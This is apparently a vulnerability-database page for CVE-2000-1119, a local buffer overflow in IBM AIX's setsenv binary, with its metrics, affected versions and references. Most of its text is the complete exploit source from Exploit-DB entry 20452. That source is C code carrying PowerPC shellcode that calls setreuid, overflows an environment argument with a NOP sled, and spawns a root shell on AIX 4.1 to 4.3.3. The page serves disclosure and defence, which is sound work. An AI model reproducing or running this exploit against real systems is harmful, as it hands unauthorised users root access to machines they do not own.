CVE-2000-1119 : Detail

CVE-2000-1119

0.04%V3
Local
2001-05-07
02h00 +00:00
2004-09-02
07h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in setsenv command in IBM AIX 4.3.x and earlier allows local users to execute arbitrary commands via a long "x=" argument.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 20452

Publication date : 2000-11-30 23h00 +00:00
Author : Last Stage of Delirium
EDB Verified : Yes

/* source: https://www.securityfocus.com/bid/2032/info AIX is a version of the UNIX Operating System distributed by IBM. A problem exists that could allow a user elevated priviledges. The problem occurs in the setsenv binary. It has been reported that a buffer overflow exists in this binary which could allow a user to overwrite variables on the stack, including the return address. This makes it possible for a malicious user to execute arbitrary code, and potentially attain a UID of 0. */ /*## copyright LAST STAGE OF DELIRIUM sep 2000 poland *://lsd-pl.net/ #*/ /*## /usr/bin/setsenv #*/ /* note: to avoid potential system hang-up please, first obtain the exact */ /* AIX OS level with the use of the uname -a or oslevel commands */ #define ADRNUM 200 #define NOPNUM 16000 char setreuidcode[]= "\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */ "\x40\x82\xff\xfd" /* bnel <setreuidcode> */ "\x7e\xa8\x02\xa6" /* mflr r21 */ "\x3a\xb5\x01\x40" /* cal r21,0x140(r21) */ "\x88\x55\xfe\xe0" /* lbz r2,-288(r21) */ "\x7e\x83\xa3\x78" /* mr r3,r20 */ "\x3a\xd5\xfe\xe4" /* cal r22,-284(r21) */ "\x7e\xc8\x03\xa6" /* mtlr r22 */ "\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */ "\x44\xff\xff\x02" /* svca */ "\xff\xff\xff\xff" "\x38\x75\xff\x04" /* cal r3,-252(r21) */ "\x38\x95\xff\x0c" /* cal r4,-244(r21) */ "\x7e\x85\xa3\x78" /* mr r5,r20 */ "\x90\x75\xff\x0c" /* st r3,-244(r21) */ "\x92\x95\xff\x10" /* st r20,-240(r21) */ "\x88\x55\xfe\xe1" /* lbz r2,-287(r21) */ "\x9a\x95\xff\x0b" /* stb r20,-245(r21) */ "\x4b\xff\xff\xd8" /* bl <setreuidcode+32> */ "/bin/sh" ; char nop[]="\x7f\xff\xfb\x78"; main(int argc,char **argv,char **e){ char buffer[20000],adr[4],*b,*envp[2]; int i; printf("copyright LAST STAGE OF DELIRIUM sep 2000 poland //lsd-pl.net/\n"); printf("/usr/bin/setsenv for aix 4.1 4.2 4.3 4.3.x PowerPC/POWER\n\n"); if(argc<2){ printf("usage: %s 41|42|43|433\n",argv[0]);exit(-1); } switch(atoi(argv[1])){ case 41: memcpy(&setreuidcode[40],"\x68\x03",2); break; case 42: memcpy(&setreuidcode[40],"\x71\x02",2); break; case 43: memcpy(&setreuidcode[40],"\x82\x04",2); break; case 433: memcpy(&setreuidcode[40],"\x92\x03",2); break; default: exit(-1); } i=0; while(*e++) i+=strlen(*e)+1; *((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000; envp[0]=&buffer[1000]; envp[1]=0; b=buffer; strcpy(b,"lsd=");b+=4; for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; *b=0; b=&buffer[1000]; sprintf(b,"xxx= ");b+=7; for(i=0;i<NOPNUM;i++) *b++=nop[i%4]; for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i]; *b=0; execle("/usr/bin/setsenv","lsd",buffer,0,envp); }

Products Mentioned

Configuraton 0

Ibm>>Aix >> Version 4.2

Ibm>>Aix >> Version 4.2.1

Ibm>>Aix >> Version 4.3

Ibm>>Aix >> Version 4.3.1

Ibm>>Aix >> Version 4.3.2

Ibm>>Aix >> Version 4.3.3

References

http://www.securityfocus.com/bid/2032
Tags : vdb-entry, x_refsource_BID
http://marc.info/?l=bugtraq&m=97569466809056&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.osvdb.org/1676
Tags : vdb-entry, x_refsource_OSVDB